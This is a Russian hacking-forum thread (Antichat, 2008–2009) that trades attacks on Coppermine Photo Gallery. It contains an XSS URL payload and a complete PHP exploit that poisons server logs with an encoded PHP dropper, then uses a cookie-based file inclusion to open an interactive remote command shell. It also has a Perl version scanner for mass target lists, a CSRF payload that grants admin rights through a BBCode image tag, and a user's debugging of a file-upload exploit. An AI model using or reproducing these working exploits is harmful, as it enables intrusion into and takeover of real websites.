Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
XSS Coppermine Photo Gallery <= 1.4.18 |
04.05.2008, 23:40
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
XSS Coppermine Photo Gallery <= 1.4.18
XSS Coppermine Photo Gallery <= 1.4.18
http://target.com/cpg/docs/showdoc.php?css="><script>alert(/Achat/)</script><
|
|
|
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit |
02.08.2008, 14:06
|
|
Banned
Регистрация: 01.08.2008
Сообщений: 7
Провел на форуме:
20122
Репутация:
11
|
|
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
PHP код:
<?php
/*
----------------------------------------------------------------------
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
----------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://coppermine-gallery.net/
dork.....: "Powered by Coppermine Photo Gallery"
[-] vulnerable code to LFI in /include/init.inc.php
263. // Start output buffering
264. ob_start('cpg_filter_page_html');
265.
266. // Parse cookie stored user profile
267. user_get_profile(); <==== [1]
268.
269. // Authenticate
270. $cpg_udb->authenticate();
[...]
301. // Process language selection if present in URI or in user profile or try
302. // autodetection if default charset is utf-8
303. if (!empty($_GET['lang']))
304. {
305. $USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang'];
306. }
307.
308. if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
309. {
310. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
311. $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
312. }
313. elseif ($CONFIG['charset'] == 'utf-8') <====== [2]
314. {
315. include('include/select_lang.inc.php');
316. if (file_exists('lang/' . $USER['lang'] . '.php'))
317. {
318. $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
319. $CONFIG['lang'] = $USER['lang'];
320. }
321. }
322. else
323. {
324. unset($USER['lang']);
325. }
326.
327. if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
328. {
329. unset($CONFIG['default_lang']);
330. }
331.
332. if (!file_exists("lang/{$CONFIG['lang']}.php"))
333. $CONFIG['lang'] = 'english';
334.
335. // We load the chosen language file
336. require "lang/{$CONFIG['lang']}.php"; <======== [3]
if $CONFIG['charset'] is set to 'utf-8' [2] (this is the default configuration), an attacker could be able to
include an arbitrary local file through the require() at line 336 [3], due to $USER array can be manipulate by
cookies (see user_get_profile() function [1] defined into /include/functions.inc.php, near lines 128-146)
[-] Path disclosure in /themes/sample/theme.php
[-] Possible bug fix in /include/functions.inc.php
128. function user_get_profile()
129. {
130. global $CONFIG, $USER;
131.
132. if (isset($_COOKIE[$CONFIG['cookie_name'].'_data'])) {
133. $USER = @unserialize(@base64_decode($_COOKIE[$CONFIG['cookie_name'].'_data']));
134. $USER['lang'] = ereg("^[a-z0-9_-]*$", $USER['lang']) ? $USER['lang'] : $CONFIG['lang'];
135. }
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function get_info()
{
global $host, $path, $cookie, $version, $path_disc;
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
preg_match("/Set-Cookie: (.*)_data/", $html, $match);
$cookie = $match[1];
preg_match("/<!--Coppermine Photo Gallery (.*) /", $html, $match);
$version = $match[1];
$packet = "GET {$path}themes/sample/theme.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/in <b>(.*)themes/", http_send($host, $packet), $match);
$path_disc = $match[1];
}
function get_logs()
{
$logs[] = "/apache/logs/access.log";
$logs[] = "/apache2/logs/access.log";
$logs[] = "/apache/log/access.log";
$logs[] = "/apache2/log/access.log";
$logs[] = "/logs/access.log";
$logs[] = "/var/log/apache/access.log";
$logs[] = "/var/log/apache2/access.log";
$logs[] = "/var/log/access.log";
$logs[] = "/var/www/logs/access.log";
$logs[] = "/var/www/log/access.log";
$logs[] = "/var/log/httpd/access.log";
$logs[] = "/etc/httpd/logs/access.log";
$logs[] = "/usr/local/apache/logs/access.log";
$logs[] = "/usr/local/apache2/logs/access.log";
for ($i = 0, $climb = "../.."; $i < 7; $i++)
{
foreach ($logs as $_log) $array[] = $climb.$_log;
$climb .= "/..";
}
return $array;
}
function first_time()
{
global $host, $path;
$packet = "GET {$path}proof.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
return (!preg_match("/_code_/", http_send($host, $packet)));
}
function lfi()
{
global $host, $path, $cookie;
$logs = get_logs();
foreach ($logs as $_log)
{
print "[-] Trying to include {$_log}\n";
$data = base64_encode(serialize(array("ID" => md5(time()), "am" => 1, "lang" => $_log.chr(0))));
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$cookie}_data={$data}\r\n";
$packet .= "Connection: close\r\n\r\n";
$resp = http_send($host, $packet);
if (!preg_match("/f=fopen/", $resp) && preg_match("/_LfI_/", $resp)) return true;
sleep(1);
}
return false;
}
print "\n+-------------------------------------------------------------------------+";
print "\n| Coppermine Photo Gallery <= 1.4.18 LFI / Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to cpg directory\n";
die();
}
$host = $argv[1];
$path = $argv[2];
get_info();
print "\n[-] Version..........: {$version}";
print "\n[-] Cookie name......: {$cookie}";
print "\n[-] Path disclosure..: {$path_disc}\n\n";
if (first_time())
{
$code = base64_decode(
"PD9waHA7JGY9Zm9wZW4oY2hyKDExMikuY2hyKDExNCkuY2hyKDExMSkuY2hyKDExMSkuY2hyKDEwMikuY2hyKDQ2KS5jaHIoM" .
"TEyKS5jaHIoMTA0KS5jaHIoMTEyKSxjaHIoMTE5KSk7ZndyaXRlKCRmLGNocig2MCkuY2hyKDYzKS5jaHIoMTEyKS5jaHIoMT" .
"A0KS5jaHIoMTEyKS5jaHIoMzIpLmNocigxMDEpLmNocig5OSkuY2hyKDEwNCkuY2hyKDExMSkuY2hyKDMyKS5jaHIoMzkpLmN" .
"ocig5NSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTUpLmNocigzOSkuY2hyKDU5KS5jaHIoMzIp" .
"LmNocigxMTIpLmNocig5NykuY2hyKDExNSkuY2hyKDExNSkuY2hyKDExNikuY2hyKDEwNCkuY2hyKDExNCkuY2hyKDExNykuY" .
"2hyKDQwKS5jaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuY2hyKDEwMC" .
"kuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoNDApLmNocigzNikuY2hyKDk1KS5jaHI" .
"oODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2hyKDgyKS5jaHIoOTEpLmNocigzOSkuY2hyKDcyKS5jaHIo" .
"ODQpLmNocig4NCkuY2hyKDgwKS5jaHIoOTUpLmNocig2NykuY2hyKDc3KS5jaHIoNjgpLmNocigzOSkuY2hyKDkzKS5jaHIoN" .
"DEpLmNocig0MSkuY2hyKDU5KS5jaHIoMzIpLmNocig2MykuY2hyKDYyKSk7ZmNsb3NlKCRmKTtkaWUoX0xmSV8pOz8+");
$packet = "GET {$path}{$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "User-Agent: {$code}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
if (!lfi()) die("\n[-] Exploit failed...\n");
}
while(1)
{
print "\ncoppermine-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}proof.php HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
list($header, $payload) = explode("_code_", http_send($host, $packet));
preg_match("/200 OK/", $header) ? print "\n{$payload}" : die("\n[-] Exploit failed...\n");
}
else break;
}
?>
|
|
|
|
04.01.2009, 01:45
|
|
Новичок
Регистрация: 28.12.2008
Сообщений: 3
Провел на форуме:
7775
Репутация:
0
|
|
Сообщение от Каратель
[PHP]<?php
/*
----------------------------------------------------------------------
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
----------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://coppermine-gallery.net/
dork.....: "Powered by Coppermine Photo Gallery"
[-] vulnerable code to LFI in /include/init.inc.php
а полного кода нет ни у кого??
Последний раз редактировалось deathking; 04.01.2009 в 01:47..
|
|
|
|
04.08.2008, 15:26
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
ПАРСЕР ВЕРСИЙ
Скрипт работает по списку.
http:// указывать обязательно
Создает после выполнения 2 файлика: output.txt и log.txt
В log.txt хранится весь лог работы, данные ДОБАВЛЯЮТСЯ.
В output.txt хранится лог по обработке текущего списка. Предыдущие результаты стираются. В этот файл не попадают сайты, версию у которых определить не удалось...
P.S. Кому не нужны версии старше определенной, удаляем 2 строки комментария в исходнике и добавляем 1 сразу после них
Код:
#!/usr/bin/perl
use LWP::UserAgent;
use Time::tm;
print "\n############# Coppermine Version Parser v0.2 ###############\n\n";
if (@ARGV != 1) { notvalid(); exit();}
my $uagent = LWP::UserAgent->new();
open (INPUT, "< input.txt");
open (OUTPUT, "> output.txt");
open (LOG, ">> log.txt");
print LOG "======================== ".localtime()." ========================\n\n";
while ($url = <INPUT>) {
chomp($url);
my $req = HTTP::Request->new(GET => "$url");
my $res = $uagent->request($req);
$mystr=$res->as_string;
if ($mystr=~ /\<\!\-\-Coppermine\s+Photo\s+Gallery\s+(\d+.\d+.\d+)/)
{
$tolog = "[+] [".localtime()."] ".$url." --> ".$1."\n";
# if ($1=~ /1.4.18/) { print LOG $tolog; print $tolog; }
# else { print LOG $tolog; print OUTPUT $tolog; print $tolog;}
print LOG $tolog; print OUTPUT $tolog; print $tolog;
}
else
{
$tolog = "[-] [".localtime()."] ".$url." --> Version unknown...\n";
print LOG $tolog; print $tolog;
}
}
print LOG "\n\n";
close INPUT;
close OUTPUT;
close LOG;
sub notvalid()
{
print "Usage: parser.pl <site list>\r\n";
print "Example: parser.pl input.txt\r\n\nNOTE: URLs in list must be ABSOLUTE!!!\n";
}
|
|
|
|
03.03.2009, 11:42
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC
csrf-инъекция в BB-теге img (комментарии к фото):
Код:
[img*]http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img*]
где [ID]- id атакующего
как только администратор посетит страницу с кодом, атакующий получит администраторские привилегии. Так-то!
//by Juri Gianni aka yeat - staker[at]hotmail[dot]it
|
|
|
|
13.03.2009, 13:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
vector, два поста выше. Если не понял - стучи в аську 674542, помогу.
|
|
|
|
01.04.2009, 20:33
|
|
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253
Репутация:
7
|
|
1.4.21 (stable)
1.4.21 (stable) - есть админка, можно как-нить шелл залить?
|
|
|
|
05.04.2009, 10:07
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Cохраняешь как пхп и запускаешь...
|
|
|
|
13.04.2009, 18:23
|
|
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253
Репутация:
7
|
|
1.4.21 (stable) - есть админка, можно как-нить шелл залить?
Снимаю вопрос, можно через плагины =)
|
|
|
|
17.04.2009, 00:44
|
|
Познающий
Регистрация: 14.07.2005
Сообщений: 62
Провел на форуме:
348453
Репутация:
6
|
|
Пытался проэксплотировать Coppermine Photo gallery - Remote PHP File Upload 1.4.19 на локалхосте. Скрипт после отправки из хтмл формы пишет "Произошла ошибка при обращении к базе данных.". Приведу немного более детальную информацию:
Код:
<form action="http://test1.ru/Gallery/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/test.txt"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
Получаю:
Произошла ошибка при обращении к базе данных.
Код:
While executing query "UPDATE cpg14x_pictures
SET pheight = ,
pwidth = ,
filesize = 0,
total_filesize = 0
WHERE pid = '-1'" on 0
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
pwidth = ,
' at line 2
Отладочная информация:
Код:
USER:
------------------
Array
(
[ID] => 7a90b61ad582429ba6863b711ab83959
[am] => 1
[lang] => russian
)
==========================
USER DATA:
------------------
Array
(
[user_id] => 1
[user_name] => 111
[groups] => Array
(
[0] => 1
)
[disk_max] => 0
[disk_min] => 0
[can_rate_pictures] => 1
[can_send_ecards] => 1
[ufc_max] => 3
[ufc_min] => 3
[custom_user_upload] => 0
[num_file_upload] => 5
[num_URI_upload] => 3
[can_post_comments] => 1
[can_upload_pictures] => 1
[can_create_albums] => 1
[has_admin_access] => 1
[pub_upl_need_approval] => 0
[priv_upl_need_approval] => 0
[group_name] => Administrators
[upload_form_config] => 3
[group_quota] => 0
[can_see_all_albums] => 1
[group_id] => 1
)
==========================
Queries:
------------------
Array
(
[0] => SELECT extension, mime, content, player FROM cpg14x_filetypes; (0.006s)
[1] => select * from cpg14x_plugins order by priority asc; (0.003s)
[2] => delete from `cpg`.cpg14x_sessions where time<1239905435 and remember=0; (0.011s)
[3] => delete from `cpg`.cpg14x_sessions where time<1238699435; (0.003s)
[4] => select user_id from `cpg`.cpg14x_sessions where session_id = '31d9cb0a10390819fbc0e3a1f7ffc37b' (0.002s)
[5] => select user_id as id, user_password as password from `cpg`.cpg14x_users where user_id=1 (0.007s)
[6] => SELECT u.user_id AS id, u.user_name AS username, u.user_password AS password, u.user_group+100 AS group_id FROM `cpg`.cpg14x_users AS u INNER JOIN `cpg`.cpg14x_usergroups AS g ON u.user_group=g.group_id WHERE u.user_id='1' (0.005s)
[7] => SELECT user_group_list FROM `cpg`.cpg14x_users AS u WHERE user_id='1' and user_group_list <> ''; (0.01s)
[8] => SELECT MAX(group_quota) as disk_max, MIN(group_quota) as disk_min, MAX(can_rate_pictures) as can_rate_pictures, MAX(can_send_ecards) as can_send_ecards, MAX(upload_form_config) as ufc_max, MIN(upload_form_config) as ufc_min, MAX(custom_user_upload) as custom_user_upload, MAX(num_file_upload) as num_file_upload, MAX(num_URI_upload) as num_URI_upload, MAX(can_post_comments) as can_post_comments, MAX(can_upload_pictures) as can_upload_pictures, MAX(can_create_albums) as can_create_albums, MAX(has_admin_access) as has_admin_access, MIN(pub_upl_need_approval) as pub_upl_need_approval, MIN( priv_upl_need_approval) as priv_upl_need_approval FROM cpg14x_usergroups WHERE group_id in (1) (0.002s)
[9] => SELECT group_name FROM cpg14x_usergroups WHERE group_id= 1 (0.002s)
[10] => update `cpg`.cpg14x_sessions set time='1239909035' where session_id = '31d9cb0a10390819fbc0e3a1f7ffc37b' (0.002s)
[11] => SELECT user_favpics FROM cpg14x_favpics WHERE user_id = 1 (0.026s)
[12] => DELETE FROM cpg14x_banned WHERE expiry < '2009-04-16 19:10:36' (0.03s)
[13] => SELECT * FROM cpg14x_banned WHERE (ip_addr='127.0.0.1' OR ip_addr='127.0.0.1' OR user_id=1) AND brute_force=0 (0.002s)
[14] => UPDATE cpg14x_pictures
SET pheight = ,
pwidth = ,
filesize = 0,
total_filesize = 0
WHERE pid = '-1' (0.001s)
[15] => SELECT COUNT(*) FROM cpg14x_pictures WHERE approved = 'NO' (0.026s)
)
==========================
GET :
------------------
Array
(
[img_dir] => include/config.inc.php
[CURRENT_PIC] => Array
)
==========================
POST :
------------------
Array
(
[save] => 1
[keysToSkip] => 1
[_GET] => 1
[_REQUEST] => 1
)
==========================
VERSION INFO :
------------------
Код:
PHP version: 5.2.4 - OK
------------------
mySQL version: 5.0.45-community-nt
------------------
Coppermine version: 1.4.19(stable)
==========================
Module: GD
------------------
GD Version: bundled (2.0.34 compatible)
FreeType Support: 1
FreeType Linkage: with freetype
T1Lib Support: 1
GIF Read Support: 1
GIF Create Support: 1
JPG Support: 1
PNG Support: 1
WBMP Support: 1
XPM Support:
XBM Support: 1
JIS-mapped Japanese Font Support:
==========================
Module: mysql
------------------
MySQL Supportenabled
Active Persistent Links 0
Active Links 1
Client API version 5.0.45
==========================
Module: zlib
------------------
ZLib Support enabled
Stream Wrapper support compress.zlib://
Stream Filter support zlib.inflate, zlib.deflate
Compiled Version 1.2.3
Linked Version 1.2.3
==========================
Server restrictions (safe mode)?
------------------
Directive | Local Value | Master Value
safe_mode | Off | Off
safe_mode_exec_dir | no value | no value
safe_mode_gid | Off | Off
safe_mode_include_dir | no value | no value
safe_mode_exec_dir | no value | no value
sql.safe_mode | Off | Off
disable_functions | no value | no value
file_uploads | On | On
include_path | .;/usr/local/php5/PEAR | .;/usr/local/php5/PEAR
open_basedir | no value | no value
==========================
email
------------------
Directive | Local Value | Master Value
sendmail_from | me@localhost.com | me@localhost.com
sendmail_path | \usr\sbin\sendmail*-t*-i | \usr\sbin\sendmail*-t*-i
SMTP | localhost | localhost
smtp_port | 25 | 25
==========================
Size and Time
------------------
Directive | Local Value | Master Value
max_execution_time | 30 | 30
max_input_time | 60 | 60
upload_max_filesize | 2M | 2M
post_max_size | 8M | 8M
==========================
Page generated in 1.545 seconds - 16 queries in 0.138 seconds - Album set : ; Meta set: ;
Заметки
Код:
\include\init.inc.php
Notice line 56: Array to string conversion
\picEditor.php
Notice line 115: Undefined variable: img_dir
Notice line 118: Undefined index: id
Notice line 123: Undefined index: newimage
Notice line 148: Undefined variable: imgObj
Notice line 148: Trying to get property of non-object
Notice line 149: Undefined variable: imgObj
Notice line 149: Trying to get property of non-object
Notice line 150: Undefined variable: CURRENT_PIC
Notice line 150: Undefined variable: CURRENT_PIC
Notice line 151: Undefined variable: CURRENT_PIC
Notice line 151: Undefined variable: CURRENT_PIC
Notice line 155: Undefined variable: CURRENT_PIC
Notice line 155: Undefined variable: CURRENT_PIC
Warning line 155: copy() [function.copy]: The first argument to copy() function cannot be a directory
Warning line 163: unlink(albums/normal_) [function.unlink]: No such file or directory
Warning line 168: filesize() [function.filesize]: stat failed for albums/thumb_
\include\picmgmt.inc.php
Warning line 165: getimagesize(albums/edit/) [function.getimagesize]: failed to open stream: No such file or directory
Прошу помочь разобратся в ошибке. |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид